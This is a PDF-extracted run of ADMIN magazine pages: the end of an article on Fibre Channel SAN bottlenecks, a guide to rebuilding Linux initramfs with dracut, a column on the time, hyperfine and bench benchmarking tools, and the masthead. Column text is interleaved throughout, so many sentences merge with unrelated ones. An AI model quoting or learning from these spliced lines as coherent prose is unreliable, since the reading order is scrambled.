communication also has weaknesses, speeds between endpoints on the number (LUN) of a storage system.
which quickly become apparent in SAN. For example, if the HBA oper- When the commands arrive, they are
certain constellations. ates at a bandwidth of 8Gbps while put into a kind of waiting loop be-
the front-end port on the storage fore it is their turn to be processed.
Backlog by R_RDY Messages system operates at 16Gbps, the stor- Especially for random I/O opera-
age port can process the data almost tions, this arrangement offers signifi-
One example of this type of backlog twice as fast as the HBA. In return, cant performance gain.
is an HBA or memory port that does at full transfer rate, the storage The number of I/O operations that
not return R_RDY messages to the system returns twice the volume of can be buffered in this queue is
sender because of a technical defect data to the HBA that it could pro- known as the queue depth. Important
or driver problem or that only returns cess in the same time. values include the maximum queue
R_RDY messages to the sender after Buffering the received frames also depth per LUN and per front-end
a delay. In turn, transmission of new nibbles away the buffer credits there, port of a storage array. These values
frames are delayed. Incoming data is which can cause a backlog and a are usually fixed in the storage sys-
then stored and consumes the avail- fabric congestion given a continu- tem and immutable. On the other
able buffer credits. The backlog then ously high data transfer volume. The hand, you can specify the maximum
spreads farther back and gradually situation becomes even more drastic queue depth on the server side of
uses up the buffer credits of the other with high data volumes at 4 and the HBA or in its driver. Make sure
FC ports on the route. 32Gbps. Such effects typically occur that the sum of the queue depths of
Especially with shared connections, at high data rates on the ports of the all LUNs on a front-end port does
all SAN subscribers who communi- nodes with the lowest bandwidth in not exceed its maximum permitted
cate over the same ISL connection are the data stream. queue depth. If, for example, 100
negatively affected because no buffer Additionally, too high a fan-in ratio of LUNs are mapped to an array port
credits are available for them during servers to the storage port is possible and addressed by their servers with
this period. A single slow-drain de- (i.e., too high a volume of data from a queue depth of 16, the maximum
vice can lead to a massive drop in the the servers arriving at the storage queue depth value at the array port
performance of many SAN devices port, which is no longer able to pro- must be greater than 1,600. If, on the
(fabric congestions). Although most cess the data). My recommendation other hand, the maximum value of
FC switch manufacturers have now is therefore to adapt the speed of the a port is only 1,024, the connected
developed countermeasures against HBA and storage port to a uniform servers can only work with a queue
such fabric congestions, they only speed and, depending on the data depth of 10 with these LUNs. It
take effect when the problem has transfer rates, maintain a moderate makes sense to ask the vendor about
already occurred and are only avail- fan-in ratio between servers and the the limits and optimum settings for
able for the newer generations of SAN storage port, if possible. the queue depth.
components. To reduce the data traffic fundamen- If a front-end port is overloaded be-
To detect fabric congestions at an tally over the ISLs, you will want to cause of incorrect settings and too
early stage, you at least need to moni- configure your servers such that the many parallel I/O operations, and
tor the ISL ports on the SAN for such hosts only read locally in the case of all queues are used up, the storage
situations. One indicator of this kind cross-location mirroring (e.g., with array sends a Queue_Full or Device_
of bottleneck is the increase in the the Logical Volume Manager) and Busy message back to the connected
zero buffer credit values at the ISL only access both storage systems servers, which triggers a complex
ports. These values indicate how when writing. With a high read rate, recovery mechanism that usually
often units had to wait 2.5μs for this approach immensely reduces ISL affects all servers connected to this
the R_RDY message to arrive before data traffic and thus the risk of poten- front-end port. On the other hand, a
further frames could be sent. If this tial bottlenecks. balanced queue depth configuration
counter grows to a value in the mil- can often tweak that extra share of
lions within a few minutes, caution Overcrowded Queue server and storage performance out
is advised. In such critical cases, the of the systems. If the mapped serv-
counters for “link resets” and “C3
Slows SAN ers or the number of visible LUNs
timeouts” at the affected ISL ports The SCSI protocol also has ways to change significantly, you need to
usually also grow. accelerate data flow. The Command update the calculations to prevent
Queuing and I/O Queuing methods gradual overloading.
Data Rate Mismatches supported by SCSI-3 achieve a sig-
nificant increase in performance. Watch Out for Multipathing
A similar effect as in the previous For example, a server connected to
case can occur if a large volume the SAN can send several SCSI com- Standard operating system settings
of data is transferred at different mands in parallel to the logical unit often lead to an imbalance in data

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 89
N U TS A N D B O LTS Fibre Channel SAN Bottlenecks

traffic, so you will want to pay atten- (QoS) strategy allows for better plan- this method is not well suited for a
tion to Fibre Channel multipathing ning of data streams and means that more granular distribution of im-
of servers, wherein only one of sev- critical servers and applications can portant applications, because the
eral connections are actively used. be prioritized from a performance administrative overhead and techni-
This imbalance then extends to the perspective. cal limitations speak against it. For
SAN and ultimately to the storage Vendors of storage systems, SAN this purpose, it is possible to route
array. Potential performance bottle- components, or HBAs have differ- servers through the SAN through
necks occur far more frequently in ent technical approaches to this specially prioritized zones in the
such constellations. Modern stor- problem, but they are not related. In data flow. In this way, the frames
age systems today use active-active no place here can the data flow be of high-priority zones receive the
mode over all available controllers centrally controlled and regulated right of way and are preferred in the
and ports. You will want to leverage across all components. Moreover, event of a bottleneck.
these capabilities for the benefit of most solutions do not make a clear On the storage systems themselves,
your environment. distinction between normal opera- QoS functionalities have been estab-
Sometimes the use of vendor- tion and failure mode. For example, lished for some time and are there-
specific multipathing drivers can if performance problems occur fore the most developed. Depending
be expedient. These drivers are within the SAN, the storage system on the manufacturer or model, data
typically slightly better suited to stoically retains its prioritized set- throughput can be limited in terms
the capabilities of the storage array, tings, because it knows nothing of megabytes or I/O operations per
have more specific options, and about the problem. second for individual LUNs, pools,
are often better suited for monitor- Although initial approaches have or servers – or, in return, prioritized
ing than standard operating system been made for communication be- at the same level. Such functions re-
drivers. On the other hand, if you tween HBAs and SAN components quire permanent performance moni-
want to keep your servers regularly to act across the board, they only toring, which is usually available
patched, a certain version main- work with newer models and are under a free license with modern
tenance and compatibility check only available for a few perfor- storage systems. Depending on the
overhead can be a result of such mance metrics. Special HBAs and setting options, less prioritized data
third-party software. their drivers support prioritization is then permanently throttled or
at the LUN level on the server. The only sent to the back of the queue if
Optimizing Data Streams drawback is that you have to set up a bottleneck situation is looming on
each individual server, which can the horizon.
with QoS be a mammoth task with hundreds However, be aware that applications
Service providers who simulta- of physical servers – not to mention in a dynamic IT landscape lose pri-
neously support many different the effort of large-scale server virtu- ority during their life cycle and that
customers with many performance- alization. you will have to adjust the settings
hungry applications in their storage Various options also exist for pri- associated with them time and time
environments need to ensure that oritizing I/Os for SAN components. again. Whether you’re prioritizing
mission-critical applications are Basically, the data stream could be storage, SAN, or servers, you should
assigned the required storage per- directed through the SAN with the always choose only one of these
formance in a stable manner at all use of virtual fabrics or virtual SANs three levels at which you control the
times. An advantage for one applica- (e.g., to separate test and produc- data stream; otherwise, you could
tion can be a disadvantage for an- tion systems or individual customers easily lose track in the event of a
other. A consistent quality of service logically from each other). However, performance problem.

Table 1: Key Fibre Channel SAN Performance Parameters


Parameter Measuring Point Recommended Value
SAN-ISL port buffer-to-buffer zero counter ISL ports on SAN switch or director <1,000,000 within 5 minutes
Server LUN queue depth HBA driver 1-32, depending on the number of LUNs at the
front-end port
SAN-ISL data throughput ISL ports on SAN switch or director <80% of maximum data throughput
Server I/O response time (average) Server operating system, volume manager <10ms
Memory system processors Storage system <70%-80%
Storage system front-end port data throughput Storage system <80%-90%
Memory system cache write pending rate Storage system <30%
Storage system LUN I/O service time (average) Storage system <10ms

90 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Fibre Channel SAN Bottlenecks N U TS A N D B O LTS

Determining Critical response times, however, you need operation as a baseline to compare
to differentiate between random with the current values of the prob-
Performance KPIs
and sequential access, because the lem situation.
The basis for the efficient provision block sizes of the two access types This comparison would reveal, for ex-
of SAN capacities is good, permanent differ considerably. For example, se- ample, whether performance-hungry
monitoring of all important SAN quential processing within a storage servers or applications are suddenly
performance indicators. You should array often takes far longer because generating 30 percent more I/O op-
know your key performance indi- of the larger block size than random erations after software updates and
cators (KPIs) and document these processing, and this difference is re- affecting other servers in the same
values over a long period of time. flected in response time. environment as noisy neighbors, or
Whether you work with vendor per- Many of the values in the storage ar- whether I/O operations can no longer
formance tools or with higher level ray differ depending on the system be processed by individual connec-
central monitoring software that architecture and cannot be set across tions because of defective compo-
queries the available interfaces (e.g., the board; you will need to contact nents or cables. However, you need
SNMP, SMI-S, or REST API), defining the vendor to find out at which uti- to gain experience in the handling
KPIs for servers, SAN, and storage is lization level a component’s perfor- and interpretation of the perfor-
decisive. On the server side, the re- mance is likely to be impaired and mance indicators from these tools to
sponse times or I/O wait times of the inquire about further critical measur- be sufficiently prepared for genuine
LUNs or disks are certainly an impor- ing points, as well. Various vendor problems. Storage is often mistakenly
tant factor, but the data throughput tools offer preset limits based on best suspected of being the endpoint of
(MBps) for the connected HBAs also practices, which can also be adapted performance problems.
can be helpful. to your own requirements. If you can make a well-founded and
Within the SAN you need to pay spe- Additionally, when planning the verifiable statement about the load
cial attention to all ISL connections, growth of your environment, make situation of your SAN environment
because often a bottleneck in data sure that if a central component (e.g., within a few minutes and precisely
throughput occurs, or, as described, an HBA on the server, a SAN switch, put your finger on the overload situa-
buffer credits are missing. Alerts are or a cache or processor board) fails, tion and its causes – or provide con-
also conceivable for all SAN ports the storage array can continue to trary evidence, backed up with well-
when 80 or 90 percent of the maxi- work without problems and does founded figures that help to discover
mum data throughput rate is reached, not lead to a massive impairment of where the problem is arising – you
which you can use to monitor all operations or even to outages of indi- will leave observers with a positive
HBAs and storage ports for this met- vidual applications. impression.
ric. However, you should be a little
more conservative with the monitor- Equipped for Emergencies Conclusions
ing parameters and feel your way for-
ward slowly. Experience has shown Even if you are familiar with the Given compliance with a few im-
that approaching bottlenecks are SAN infrastructure and have set up portant rules and monitoring in
often overlooked if too many alerts appropriate monitoring at key points the right places, even large Fibre
are regularly received and have to be (Table 1), performance bottlenecks Channel storage networks can be
checked manually. cannot be completely ruled out. A operated with great performance
component failure, a driver problem, and stability. If you give priority
Optimizing Array or a faulty Fibre Channel cable can to the most important applications
cause sudden problems. If such an at a suitable point, you can keep
Performance incident occurs and important appli- them available even in the event of
For a storage array, the load on the cations are affected, it is important a problem. If you are also trained
front-end processors, the cache write to gain a quick overview of the es- in the use of performance tools and
pending rate, and the response times sential performance parameters of have the values from normal opera-
of all LUNs presented to the servers the infrastructure. Therefore, it is tion as a reference, the causes of
are important values you will want very helpful if you have the relevant performance problems can often be
to monitor. In the case of the LUN values from unrestricted normal identified very quickly. Q

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 91
N U TS A N D B O LTS initramfs and dracut

Rebuilding the Linux ramdisk

A New Beginning
If your Linux system is failing to boot, the dracut tool can be a convenient way to build a new ramdisk.
By Thorsten Scherf

After moving your hard disk to a tems, this is typically systemd. The You can view the contents of the disk
new system, the Linux system sud- init process can then use the drivers with the cpio tool. The associated file
denly fails to boot. Often this happens and programs provided by initramfs is simply a cpio archive, but lsinitrd
because of missing drivers in the to gain access to the root volume it- gives you a more elegant and conve-
ramdisk, which the kernel needs to self. The root volume is usually avail- nient approach:
boot the system. In this article, I take a able on a local block device but can
closer look at the handling of the init- also be mounted over the network, lsinitrd U
ramfs file and introduces dracut [1] as if required. For this to work, all the /boot/initramfs-$(uname -r).img | less
a practical helper. required drivers must, of course, be
Many users only see the initramfs available in the initramfs. If you are only interested in the ker-
(initial random access memory file- These can be drivers for LVM, RAID, nel drivers provided by this ramdisk,
system) archive file as yet another file the filesystem, the network, or a vari- you can restrict the output:
in the boot directory. It is automati- ety of other components. The details
cally created when a new kernel is of this depend on the individual con- lsinitrd /boot/initramfsU
installed and deleted again when the figuration of the system. For example, -$(uname -r).img | grep U
kernel is removed from the system. if the root filesystem is located on an -o '/kernel/drivers/.*xz'
But this initial ramdisk plays an im- encrypted partition, the tools for ac-
portant role, since it ensures that the cessing it must be available within The command in Listing 1 tells the
root filesystem can be accessed after the ramdisk. tool to display only the available net-
the computer has been restarted, to When installing a new kernel, the work card drivers.
be able to access all the tools that are ramdisk is automatically created and
necessary for the computer to con- installed based on the system proper- Support from dracut
tinue booting. ties. On RPM-based distributions, for
The GRUB2 bootloader, used in most example, the new-kernel-pkg tool is In some cases, you may now need
Lead Image © Barmaliejus, Fotolia.com

cases today, is responsible for load- used; it is called automatically as part to create a new ramdisk manually.
ing the Linux kernel (vmlinuz) and a of the kernel installation. By default, For example, if you want it to sup-
ramdisk (initramfs) into memory at the ramdisk resides alongside the ker- port new hardware or allow access
boot time. The kernel then mounts nel in the /boot directory, and a new to a newly encrypted volume, you
the ramdisk on the system as a root entry for the bootloader is created so have no alternative but to create
volume and then starts the actual that, after a reboot, the new kernel a new initramfs for the current
init process. On current Linux sys- loads with the appropriate initramfs. kernel. The easiest way to do this

92 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
initramfs and dracut N U TS A N D B O LTS

is to use the dracut tool, which is Listing 1: Available Network Card Drivers
a framework that provides specific
lsinitrd /boot/initramfs-$(uname -r).img | grep -o '/kernel/drivers/net/.*xz'
functions within an initial ramdisk
/kernel/drivers/net/ethernet/broadcom/bnx2x/bnx2x.ko.xz
based on modules. On a Fedora
/kernel/drivers/net/ethernet/broadcom/cnic.ko.xz
system these modules are located /kernel/drivers/net/mdio.ko.xz
in the /usr/lib/dracut/modules.d/
directory. For Linux veterans, dra-
cut also offers a wrapper named Listing 2: File Size Comparison
mkinitrd, but it is far less flexible
ls -ls /boot/initramfs-$(uname -r)*.img
than calling dracut directly. To cre- 24350 -rw-------. 1 root root 24932655 Apr 16 16:01 /boot/initramfs-4.20.10-200.fc29.x86_64.img
ate a new initramfs archive, just 69242 -rw-------. 1 root root 70901695 Apr 16 16:04 /boot/initramfs-4.20.10-200.fc29.x86_64-new.img
run the following command in the
simplest case:
Listing 3: Specify Kernel Version
dracut --force U
dracut --kver 3.10.0-957.el7.x86_64 /boot/initramfs-$(uname -r)-other-kernel.img
/boot/initramfs-$(uname -r).img ls -l /boot/initramfs-3.10.0-957.el7.x86_64.img
-rw-------. 1 root root 22913501 Apr 14 11:00 /boot/initramfs-3.10.0-957.el7.x86_64.img
The tool uses host-only mode by
default and overwrites the existing
initramfs file if the --force option is Clevis module are now part of the In the bootloader configuration you
set. In this mode, dracut only uses the initramfs: need to remove the rhgb and quiet
modules and drivers needed for the entries, if present, to ensure that
operation of the local system. If you lsinitrd /boot/U messages are displayed on the screen
plan to use the hard disk in a new initramfs-$(uname -r)U when booting.
system in the future, disable host-only -clevis.img|grep clevis Additionally, add the rd.shell and
mode as follows: rd.debug entries to the kernel line of
To include a specific kernel driver the bootloader so that dracut starts
dracut --no-hostonly U in the initramfs, you can use the a corresponding shell in case of an
/boot/initramfs-$(uname -r)-new.img command: error and outputs further debug mes-
sages. The dracut tool also writes
The fact that dracut now writes far dracut --add-drivers bnx2x U the messages to the /run/initramfs/
more data into the initramfs file is /boot/initramfs-$(uname -r)-bnx2x.img rdsosreport.txt file. Both changes
easily seen by comparing the sizes of can be made either statically in the
the two files (Listing 2). Here, too, the call to lsinitrd should bootloader configuration file or by
The following command shows which confirm that the drivers are in place dynamically editing the boot menu
modules – and thus functions – dra- in the archive. Which drivers or mod- entry.
cut provides: ules are required, of course, depends
on the system on which the initramfs Conclusions
dracut --list-modules is to be used.
By default, dracut always creates an Thanks to dracut, all the major Linux
If you want to use a new ramdisk initramfs archive for the kernel cur- distributions provide a framework
on a system on which the Clevis rently in use. In some cases, it may be for creating an initial ramdisk. The
encryption framework is required to necessary to create the archive file for framework is very flexible, supports
enable access to the root partition, a different kernel version. This is eas- booting a system from many differ-
the matching dracut module needs to ily done if the desired kernel version is ent sources, and enables block device
be included in the initramfs file. The specified with the --kver option when abstractions like RAID, LVM device
output from dracut --list-modules calling dracut (Listing 3). mapper, FCoE, iSCSI, NBD, and NFS.
should first confirm that dracut is fa- Thanks to its modular structure, the
miliar with the Clevis module. If this Troubleshooting the Shell tool can be easily combined with
is the case, include the module in the other frameworks to enable, say, au-
initramfs archive as follows: If the system does not boot as usual tomatic decryption of LUKS volumes
and access to the root volume is not through Clevis integration. Q
dracut --add clevis U possible, dracut provides a shell for
/boot/initramfs-$(uname -r)-clevis.img troubleshooting, if required. It is
a good idea to make the following Info
The following call should confirm changes to the bootloader configu- [1] dracut [https://dracut.wiki.kernel.org/
that the files belonging to the ration to facilitate troubleshooting. index.php/Main_Page]

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 93
N U TS A N D B O LTS Performance Tuning Dojo

Favorite benchmarking tools

High
Definition
We take a look at three benchmarking tool favorites: time,
hyperfine, and bench. By Federico Lucifredi

At the Dragon Propulsion Labora- favorites from the simplest to the much CPU time was allocated in user
tory, we are partial to using the sim- more sophisticated. and kernel (sys) modes:
plest tool that will do the job at hand
– particularly when dealing with $ time sleep 1
Tempus Fugit
the inherent complexity that perfor- real 0m1.004s
mance measurement (and tuning) The benchmark archetype is time: user 0m0.002s
brings to the table. Yet that same simple, easy to use, and well under- sys 0m0.001s
complexity often requires advanced stood by most users. In its purest
tooling to resolve the riddles posed form, time takes a command as a What not everyone knows is that the
by performance questions. I will ex- parameter and times its execution in default time command is actually one
amine my current benchmarking tool the real world (real), as well as how of the bash-builtins [1]:

Table 1: Format Specifiers* $ type time


Option Function time is a shell keyword

C Image name and command-line arguments (argv) $ which time


/usr/bin/time
D Average size of the process’s unshared data area (KB)
E Wall clock time used by the process ([hours:]minutes:seconds)
There is time, and then there is GNU
F Number of major page faults (requiring I/O) incurred time [2]. The standalone binary ver-
I Number of filesystem inputs sion sports a few additional capabili-
K Average total (data + stack + text) memory use of the process (KB) ties, the most noteworthy being its
M Maximum resident set size of the process (KB) ability to measure page faults and
O Number of filesystem outputs by the process swapping activity by the tested bi-
nary:
P Percentage of the CPU that this job received (user + system divided by running time)
R Number of minor page faults (not requiring I/O, resolved in RAM)
$ /usr/bin/time gcc test.c -o test
S Kernel-mode CPU seconds allocated to the process 0.03user 0.01system 0:00.05elapsed U
U User-mode CPU seconds allocated to the process 98%CPU (0avgtext+0avgdata U
W Number of times the process was swapped out of main memory 20564maxresident)k
X Average amount of shared text in the process (KB) 0inputs+40outputs U

Z System’s page size (bytes) – this is a system constant (0major+4475minor)pagefaults 0swaps

c Number of times the process was context-switched involuntarily (time slice expired)
The sixth Dojo was dedicated to GNU
e Wall clock time used by the process (seconds)
time’s amazing capabilities, and I
k Number of signals delivered to the process invite you to read up in your prized
p Average unshared stack size of the process archive of ADMIN back issues [3].
Lead Image © Lucy Baldwin, 123RF.com

r Number of socket messages received Table 1 sums up the capabilities of


s Number of socket messages sent this versatile tool, which include
t Average resident set size of the process (KB) memory use, basic network bench-
marks (packet counts), filesystem I/
w Number of times that the program was context-switched voluntarily
O operations (read and write counts),
x Exit status of the command
and page faults, both minor (MMU)
* Available in GNU time, version 1.7 (adapted from the man page). and major (disk access).

94 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Performance Tuning Dojo N U TS A N D B O LTS

In this test, hyperfine sampled


10 runs of a simple delay com-
mand, determined an expected
value (mean) 1.6ms greater than
Figure 1: Hyperfine displays progress in real time, which is really handy when managing requested with a standard deviation
longer tests. (sigma) of 0.3ms [7], and reported
the range between the minimum
Going Deeper valid result automatically on its own and maximum values encountered
recognizance. Normally, it performs – handling insubstantial results as
Back in issue 12, I mentioned Mar- 10 runs of the specified command by well as the appearance of significant
tin Pool’s promising tool judge [4]. default, but the minimum number outliers. Incongruous data will gen-
Unfortunately, judge never made of runs can be tuned manually (-m). erate warnings like the following:
it past version 0.1, with its most Returning again to the same sleep [6]
recent release dated back to 2011. example I used previously, I show a Warning: Statistical outliers were
However, Martin’s efforts have an snapshot of the interactive progress detected. Consider re-running this
impressive successor in David Pe- report in Figure 1, followed by the fi- benchmark on a quiet PC without any
ter’s recent hyperfine [5], which is nal results of the run in Figure 2. interferences from other programs.
a step up from time when timing a
run, because it runs the task a num-
ber of times and generates relevant
statistics.
Remarkably, the tool takes care of
determining how many runs are
necessary to generate a statistically Figure 2: A summary of results for a very simple example.
N U TS A N D B O LTS Performance Tuning Dojo

Figure 5: Generating the Figure 4 test report with Bench.

multiple sam- Info


pling runs, but it [1] bash-builtins (7) man page:
Figure 3: Bench thoroughly weighs the presence of outliers in the data. provides much [https://manpages.ubuntu.com/
less feedback as manpages/bionic/en/man7/bash-builtins.7.
Very short execution times will lead measurements are being taken. Once html#see%20also]
to warnings requesting a better test samples are obtained, however, the [2] time (1) man page:
and will likely inflate the execution analysis of the results is comprehen- [https://manpages.ubuntu.com/
count: Try hyperfine 'ls' to see this sive (Figure 3). As with judge, mul- manpages/bionic/en/man1/time.1.html]
happen in practice. The program can tiple commands can be compared in a [3] “Time Out” by Federico Lucifredi, ADMIN,
be dominated by startup time, or the single run, but the pièce de résistance issue 12, 2012, pg. 96
hot-cache case might not be what you of bench is really its ability to generate [4] judge:
want to measure. beautiful charts from the data. Fig- [http://judge.readthedocs.org/en/latest/]
The tool can account for cache ure 4 makes the case for using bench [5] hyperfine:
warmup runs (--warmup N), and if the plain, displaying the report generated [https://github.com/sharkdp/hyperfine]
opposite behavior is desired, it is just by the test in Figure 5. Everything is [6] sleep (1) man page:
as easy to clear caches before every in one place and ready to share with [https://manpages.ubuntu.com/
run by passing the appropriate com- others on your team. manpages/bionic/en/man1/sleep.1.html]
mand (--prepare COMMAND). Exporting Lack of pre-built packages in the [7] Standard deviation:
the timing results for all runs is also major Linux distributions and the [https://en.wikipedia.org/wiki/Standard_
conveniently supported in JSON, CSV, broken builds for macOS [9] found deviation]
and even Markdown. in brew [10] make installing bench [8] bench:
less than the ideal experience, but [https://github.com/Gabriel439/bench]
Bench Test its usefulness more than makes up [9] bench GitHub issue 12:
for the minor inconvenience of hav- [https://github.com/Gabriel439/bench/
The bench [8] command also is ing to use Haskell’s stack build sys- issues/12]
geared toward statistical analysis of tem [11] for setup. Q [10] Homebrew: [https://brew.sh/]
[11] The Haskell tool stack:
[https://docs.haskellstack.org/en/stable/
README/]

The Author
Federico Lucifredi (@0xf2) is the Product
Management Director for Ceph Storage at
Red Hat and was formerly the Ubuntu Server
Project Manager at Canonical and the Linux
“Systems Management Czar” at SUSE. He
enjoys arcane hardware issues and shell-
scripting mysteries and takes his McFlurry
shaken, not stirred. You can read more from
him in the new O’Reilly title AWS System
Figure 4: Bench uses a pure HTML canvas to visualize results interactively. Administration.

96 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
S E RV I C E Contact Info / Authors

WRITE FOR US
Admin: Network and Security is looking • unheralded open source utilities
for good, practical articles on system ad- • Windows networking techniques that
ministration topics. We love to hear from aren’t explained (or aren’t explained
IT professionals who have discovered well) in the standard documentation.
innovative tools or techniques for solving We need concrete, fully developed solu-
real-world problems. tions: installation steps, configuration
Tell us about your favorite: files, examples – we are looking for a
• interoperability solutions complete discussion, not just a “hot tip”
• practical tools for cloud environments that leaves the details to the reader.
• security problems and how you solved If you have an idea for an article, send
them a 1-2 paragraph proposal describing your
• ingenious custom scripts topic to: edit@admin-magazine.com.

Contact Info
Editor in Chief While every care has been taken in the content of
Joe Casad, jcasad@linuxnewmedia.com the magazine, the publishers cannot be held re-
Managing Editors sponsible for the accuracy of the information con-
Rita L Sooby, rsooby@linuxnewmedia.com tained within it or any consequences arising from
Lori White, lwhite@linuxnewmedia.com the use of it. The use of the DVD provided with the
Senior Editor magazine or any material provided on it is at your
Ken Hess own risk.
NOW PRINTED ON recycled paper Copyright and Trademarks © 2020 Linux New
Localization & Translation
from 100% post-consumer waste; Ian Travis Media USA, LLC.
no chlorine bleach is used in the News Editor No material may be reproduced in any form
production process. Jack Wallen whatsoever in whole or in part without the writ-
ten permission of the publishers. It is assumed
Copy Editors
that all correspondence sent, for example, let-
Amy Pettle, Megan Phelps, Amber Ankerholz
Authors ters, email, faxes, photographs, articles, draw-
Layout ings, are supplied for publication or license to
Konstantin Agouros 70 Dena Friesen, Lori White third parties on a non-exclusive worldwide
Chris Binnie 46, 64 Cover Design basis by Linux New Media unless otherwise
Dena Friesen, Illustration based on graphics by stated in writing.
Samuel Bocetta 22 liu zishan, 123RF.com All brand or product names are trademarks
Roland Döllinger 88 Advertising of their respective owners. Contact us if we
Brian Osborn, bosborn@linuxnewmedia.com haven’t credited your copyright; we will always
Thomas Drilling 42 phone +49 89 3090 5128 correct any oversight.
Mathias Hein 16 Publisher Printed in Nuremberg, Germany by hofmann
Brian Osborn infocom GmbH on recycled paper from 100% post-
Ken Hess 3 Marketing Communications consumer waste; no chlorine bleach is used in the
Gwen Clark, gclark@linuxnewmedia.com production process.
Petros Koutoupis 10
Linux New Media USA, LLC Distributed by Seymour Distribution Ltd, United
Jeff Layton 78 2721 W 6th St, Ste D Kingdom
Lawrence, KS 66049 USA
Martin Loschwitz 30, 36, 60 ADMIN (ISSN 2045-0702) is published bimonthly
Customer Service / Subscription by Linux New Media USA, LLC, 2721 W 6th St, Ste D,
Federico Lucifredi 94 For USA and Canada: Lawrence, KS 66049, USA. January/February 2020.
Thorsten Scherf 54, 92 Email: cs@linuxnewmedia.com Periodicals Postage paid at Lawrence, KS. Ride-
Phone: 1-866-247-2802 Along Enclosed. POSTMASTER: Please send
Christian Schulenburg 26 (Toll Free from the US and Canada) address changes to ADMIN, 2721 W 6th St, Ste D,
For all other countries: Lawrence, KS 66049, USA.
Jack Wallen 8
Email: subs@linuxnewmedia.com Published in Europe by: Sparkhaus Media GmbH,
Matthias Wübbeling 52 www.admin-magazine.com Zieblandstr. 1, 80799 Munich, Germany.

98 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M

Вам также может понравиться